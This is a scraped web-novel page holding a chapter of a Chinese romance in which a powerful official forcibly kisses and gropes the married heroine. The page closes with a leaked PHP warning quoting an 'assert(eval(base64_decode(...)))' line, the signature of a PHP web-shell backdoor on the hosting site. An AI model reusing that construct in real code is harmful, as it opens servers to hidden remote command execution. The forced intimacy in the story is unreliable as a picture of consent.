88小说 > 都市小说 > 绯闻总统①国民男神,结婚吧! > 第21章 不在意所以不紧张
88小说 www.88xs.org,最快更新绯闻总统①国民男神,结婚吧!最新章节!

    “你心理素质强。”

    偌大的房间内,安静的只能听到皮质座椅因为江斯楠坐直身子的动作,发出悉悉索索的声音。

    关锦桐没有吭声,一脸疑问。

    “一个女孩儿,如果没有超乎寻常的心理素质,怎么能在被未婚夫捉奸时,镇定自若地穿衣服。”江斯楠那双眸子平静无波澜,深邃到让人无法看透。

    江斯楠给关锦桐留了余地,没有说破……

    在那种状况还能那么镇定,一是因为内心强大,二……就只能说明那个女孩儿并不爱自己的未婚夫,就算是被撞破了,失去婚约也不会在意,甚至可以说她心里是期待着失去婚约的。

    不在意……所以不紧张。

    关锦桐记得……那一天,同样镇定自若穿衣服的并不只有关锦桐一个人,当时江斯楠的未婚妻苏曼青和殷暮霖一起出现在房间里。

    殷暮霖眼底充满失望,苏曼青含泪歇斯底里……疯了一样冲了出去。

    可是这个男人却冷静的穿衣服,命令他的助理给关锦桐买事后药。

    并且镇定自若的和关锦桐坐下商量后面的事情,由始至终都没有追出去寻找苏曼青。

    那天,他们两个人都没有任何关于昨晚的记忆,江斯楠准确的判断出他们应该是被人下药了,然后很迅速的人去查把新闻压下来。

    江斯楠不知道昨晚他们到底有没有发生过什么,所以如果关锦桐需要江斯楠负责,江斯楠便和关锦桐结婚,如果关锦桐不愿意结婚,保险起见他希望关锦桐吃药,避免后面不必要的麻烦。

    关锦桐当着江斯楠的面吞下避孕药之后拎着包就离开了,没有多余的话……用行动表明了自己不想和江斯楠往后有什么牵扯。

    关锦桐收回思绪,看着眼前这个眉目深邃的男人,看起来江斯楠以为自己和他一样冷静,冷静到冷血。

    可关锦桐和他,并不是一类人。

    关锦桐紧握的双手,骨节有些泛白。

    “国务卿先生,我的心理素质并没有您想的那么强大。而且我是一个已经结婚的人,要是离婚和您结婚的话……才真的会对您的名誉造成不必要的损害。您被称作国民男神,喜欢您的女人多不胜数……如过江之鲫,其中比我优秀的也大有人在,我很感谢您的救命之恩,只是为您工作我恐怕没有那个能力。”

    江斯楠淡漠从容,他点了一根烟,骨节分明的白皙手指夹着,再次按了按太阳穴:“帮我按一按”

    这句话,江斯楠的声线是略带疲惫的……充满引诱和蛊惑的。

    关锦桐一下子就尴尬了,按一按?

    倒不是关锦桐不是不会,以前关老爷子总是头痛,都是关锦桐帮着按摩缓解的。

    只是话还没说清楚,和江斯楠的任何接触都会让她不知所措,但看江斯楠似乎真的很头痛的样子,关锦桐还是起身走至江斯楠身边。

    沙发靠着墙壁,关锦桐无法站在江斯楠身后帮他按摩,也不愿意站在江斯楠对面,那样太暧昧。

    关锦桐只能单膝跪在江斯楠身侧,手臂从江斯楠脑后绕过去,细长如玉管儿似的手指按住江斯楠两侧的太阳穴,轻轻揉着。

    冰凉的指腹轻柔按压,倒是让江斯楠整个头颅松快了不少。

    关锦桐身上的幽香就在鼻尖萦绕,随着她的动作时不时窜入鼻腔……江斯楠的呼吸稍微有些重。

    “疼吗?”关锦桐低声问。

    江斯楠干燥有力的大手覆在了关锦桐的手背上,关锦桐吓了一跳本能的想要抽回,却被江斯楠紧紧拽住,他轻轻的……把关锦桐的小手移了位置,重新放置好便收回了手。

    关锦桐心脏剧烈的跳动着,剧烈到她按在江斯楠穴位处的指腹都跟着颤动。

    江斯楠放在烟灰缸上的香烟,还在冒着白色的烟雾,关锦桐想……出于江斯楠对自己的救命之恩,自己也应该提醒一下他。

    “您的烟瘾有些大,头痛可能也和这个有关,戒了烟可能会好一些。”

    “恩……”

    江斯楠轻轻应了一声,似乎很舒服。

    不知道过了多久,关锦桐的手臂都酸了,腿也发麻跪不住了。

    江斯楠好像睡着了一样,关锦桐缓缓移开手指准备轻手轻脚的离开,谁知脚刚一触底就是一阵钻心的麻。

    关锦桐差点儿倒坐在了江斯楠的腿上,幸亏江斯楠眼疾手快,有力的手臂拖住了关锦桐的腰身。

    “麻了?”江斯楠问。

    “放松……坐一下,一会儿就好。”

    关锦桐如坐针毡,在碰到江斯楠双腿时条件反射的要站起来,却被江斯楠的有力的手臂环住腰身动弹不得,只能窝在他怀里。

    江斯楠垂眸看着怀里的小女人,睫毛下掩藏的墨色瞳仁璀璨深邃的如同装下了整个星空一般。

    吻……

    “江斯楠!”关锦桐唤出了江斯楠的名字,声音满是惊慌。

    江斯楠的大手从关锦桐的毛衣里退出来,却迟迟没有从关锦桐的身上起来。

    “国务卿先生……”关锦桐喉头一阵阵发紧。

    经过上一次被绑架的事件,关锦桐知道自己无论如何都不是男性的对手,所以不敢轻举妄动。

    江斯楠看到了关锦桐眼里的惊恐,他伸手……拨开挡在关锦桐瞳仁前的碎发,坐起身再次点了一根烟。

    关锦桐也连忙坐起身整理自己的衣服和头发,手指覆在发痛的唇瓣上,眼睛红了一圈。

    关锦桐不喜欢被这样对待,觉得受到了侮辱,委屈极了。

    “你妹妹并不是经商的料,识人这个部分和你一样糟糕,容易被感情蒙蔽。”江斯楠吐雾间开口说了一句,声音深沉内敛。

    有些事原本和江斯楠无关,他是不想说的,或许作为刚才轻薄的歉意,江斯楠还是给关锦桐提了一个醒。

    关锦桐一怔,听到关于关锦珊的问题,她吞下自己的委屈,问:“您能不能……说的更加明白一些?”

    关锦桐看着还默不作声的男人,吞吐细白烟雾中他的五官线条显得更加刚硬又冷漠:“你很聪明,会明白的。”

    “国务卿先生……”

    关锦桐刚张口电话就响了,来电依然只是电话号码,这个电话号码关锦桐很熟悉,是殷暮霖的。

    电话铃声响的很急促,关锦桐看了江斯楠一眼接了电话:“喂……”

    “关锦桐你和我妈说了什么?”殷暮霖的声音很低沉,略带这些不耐烦责问的意思。

    关锦桐看了眼江斯楠,刻意转过身去,用手挡住唇瓣和话筒:“没什么,只是说了一些事实。”

    “我妈心脏病发送到医院差点儿没救过来你知道吗?”

    关锦桐一愣,这个……她倒没有想到。

    听到电话那头关锦桐的沉默,殷暮霖再次开口:“不管怎么说,我妈也是你的婆婆!你的长辈!从一开始我们结婚我就和你说过,我不要求你做到孝顺至极,至少不能顶撞,我妈心里迈步过去的那道坎儿……是你婚前和别的男人上过床,是你母亲破坏了我小姨的婚姻……你懂吗?”

Warning: assert() [function.assert]: Assertion "$)狈吓= eval(base64_decode($彏堍櫮畱摟));" failed in /www/wwwroot/www.88xs.org/modules/article/reader.php on line 2